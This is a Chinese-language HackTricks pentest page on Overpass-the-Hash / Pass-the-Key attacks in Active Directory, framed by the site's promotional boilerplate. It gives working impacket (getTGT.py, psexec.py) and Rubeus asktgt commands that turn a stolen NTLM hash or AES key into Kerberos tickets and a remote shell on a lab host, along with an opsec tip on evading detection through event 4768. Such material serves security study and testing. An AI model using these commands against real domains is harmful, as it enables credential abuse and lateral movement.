hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

通过哈希/传递密钥

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

通过哈希/传递密钥（PTK）

这种攻击旨在使用用户的NTLM哈希或AES密钥请求Kerberos票据，作为常见的通过NTLM协议传递哈希的替代方法。因此，在禁用NTLM协议并只允许Kerberos作为认证协议的网络中，这可能特别有用。

为了执行此攻击，需要目标用户帐户的NTLM哈希（或密码）。因此，一旦获得用户哈希，就可以为该帐户请求TGT。最后，可以访问任何具有用户帐户权限的服务或计算机。

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

您可以使用**-aesKey [AES密钥]来指定使用AES256**。
您还可以将票据与其他工具一起使用，如smbexec.py或wmiexec.py

可能出现的问题：

• PyAsn1Error（'NamedTypes can cast only scalar values'）：通过将impacket更新到最新版本来解决。
• KDC无法找到名称：通过使用主机名而不是IP地址来解决，因为Kerberos KDC无法识别IP地址。

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

这种攻击类似于Pass the Key，但不是使用哈希值来请求票据，而是窃取票据本身并用其作为所有者进行身份验证。

{% hint style="warning" %} 当请求TGT时，会生成事件4768：请求了一个Kerberos身份验证票据（TGT）。从上面的输出中可以看到KeyType为RC4-HMAC（0x17），但Windows的默认类型现在是AES256（0x12）。 {% endhint %}

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

参考资料

• https://www.tarlogic.com/es/blog/como-atacar-kerberos/

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品——The PEASS Family
• 获得官方PEASS和HackTricks周边产品
• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。